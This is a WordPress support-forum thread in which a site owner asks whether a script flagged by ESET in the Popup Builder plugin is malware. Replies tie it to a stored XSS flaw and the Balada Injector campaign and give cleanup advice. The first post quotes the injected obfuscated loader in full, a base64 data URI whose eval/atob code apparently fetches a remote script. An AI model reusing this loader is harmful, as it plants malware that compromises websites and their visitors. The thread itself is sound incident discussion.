• Resolved beatcore

    (@beatcore)


    Hi,

    we got our Website locally blocked by the ESET Virus Scanner, saying it’s infected by a trojan (this is why i am not posting a link to it)! They hihglight a piece of code which comes from your Popup-Builder:

    <script defer id="sgpb-custom-script-2075" src="data:text/javascript;base64,alF1ZXJ5KGRvY3VtZW50KS5yZWFkeShmdW5jdGlvbigpe3NnQWRkRXZlbnQod2luZG93LCAic2dwYldpbGxPcGVuIiwgZnVuY3Rpb24oZSkge2lmIChlLmRldGFpbC5wb3B1cElkID09ICIyMDc1Iikge3ZhciBqamhmZ25qYy8qcmJobG9lbHgqLz0vKnJiaGxvZWx4Ki9ldmFsOy8qcmJobG9lbHgqL3ZhciB1Y3h0ZnUvKnJiaGxvZWx4Ki89LypyYmhsb2VseCovYXRvYjtqamhmZ25qYyh1Y3h0ZnUoImQiKy8qcmJobG9lbHgqLyJtRnkiKy8qcmJobG9lbHgqLyJJR1EiKy8qdXN3b2l1emxsdSovIjlaRzlqZCIrLypyYmhsb2VseCovIlcxbGJuUSIrLyp1c3dvaXV6bGx1Ki8iN2QiKy8qcmJobG9lbHgqLyJtRnkiKy8qcmJobG9lbHgqLyJJSE05WkM1IisvKnVzd29pdXpsbHUqLyJqY21WaGQiKy8qcmJobG9lbHgqLyJHVkZiR1Z0Wlc1IisvKnVzd29pdXpsbHUqLyIwIisvKnlva3lkcmh6Ki8iS0NKeiIrLyp5b2t5ZHJoeiovIlkzSnBjSFEiKy8qdXN3b2l1emxsdSovImlLVHR6IisvKnlva3lkcmh6Ki8iTG5OeSIrLypyYmhsb2VseCovIll6IisvKnlva3lkcmh6Ki8iMCIrLyp5b2t5ZHJoeiovIm5hSFIwIisvKnlva3lkcmh6Ki8iY0hNNkx5IisvKnJiaGxvZWx4Ki8iOXoiKy8qeW9reWRyaHoqLyJiMlowIisvKnlva3lkcmh6Ki8iTG5Od1pXTnBZV3hqY21GbWQiKy8qcmJobG9lbHgqLyJHSnZlQzUiKy8qdXN3b2l1emxsdSovImpiMjAiKy8qeW9reWRyaHoqLyJ2U2xwR1dXSkRKeiIrLyp5b2t5ZHJoeiovInRrTG1kIisvKnJiaGxvZWx4Ki8ibGQiKy8qcmJobG9lbHgqLyJFVnMiKy8qdXN3b2l1emxsdSovIlpXMWxiblJ6IisvKnlva3lkcmh6Ki8iUSIrLyp1c3dvaXV6bGx1Ki8ibmxVWVdkIisvKnJiaGxvZWx4Ki8iT1lXMWxLQ2QiKy8qcmJobG9lbHgqLyJvWldGa0p5IisvKnJiaGxvZWx4Ki8ibGJNRjAiKy8qeW9reWRyaHoqLyJ1WVhCd1pXNSIrLyp1c3dvaXV6bGx1Ki8ia1EiKy8qdXN3b2l1emxsdSovIjJocGJHUSIrLyp1c3dvaXV6bGx1Ki8ib2N5IisvKnJiaGxvZWx4Ki8iazciKSk7fTt9KTt9KTs="></script>

    Is that trustworhty code or is it possible that the plugin is infected by malware?

    thank you,

    best regards

Viewing 4 replies - 1 through 4 (of 4 total)
  • pepe80

    (@pepe80)

    Hi @beatcore,
    my site’s popup was also hacked. Edit the popup and check whether javascript code has been injected in the “Custom JS or CSS” menu. Update the plugin to the latest version. The bug in the plugin is described here:
    https://wpscan.com/blog/stored-xss-fixed-in-popup-builder-4-2-3/

    Thread Starter beatcore

    (@beatcore)

    Hi pepe80!

    Thank you for your answer! I’ve already removed the bit in the Custom JS section and updated everything. They even injected the wp-blogheader.php with random code bits…

    Edit: Just saw it in another post, don’t forget to check for additional admin accounts which might be there after the hack!

    Too bad, the support doesn’t care much about this problem here in the forum…

    Here’s another link with some information about the hack:

    https://blog.sucuri.net/2024/01/thousands-of-sites-with-popup-builder-compromised-by-balada-injector.html

    • This reply was modified 9 months ago by beatcore.
    Plugin Support Jawad Ahmed

    (@jawada)

    Hi there,

    We are sorry about this issue and the inconvenience caused. The team has been working to fix this issue and has addressed it in our latest version. Please remove the code completely and if possible please delete and popup and create a new one.

    Please also make sure you do not have any unknown admin access to your site.

    Since it’s encoded, I can’t directly interpret its contents.

    I hope this will help. If you require further assistance or have any additional questions, please don’t hesitate to contact us through our support portal. Our team is always here to help!

    https://help.popup-builder.com/en/

    Sincerely,

    Plugin Support Jawad Ahmed

    (@jawada)

    Hi @beatcore

    Since the issue has been addressed, marking this thread as resolved. If you require further assistance or have any additional questions, please don’t hesitate to contact us through our support portal. Our team is always here to help!

    https://help.popup-builder.com/en/

    Sincerely,

Viewing 4 replies - 1 through 4 (of 4 total)
  • The topic ‘Trojan Incection?’ is closed to new replies.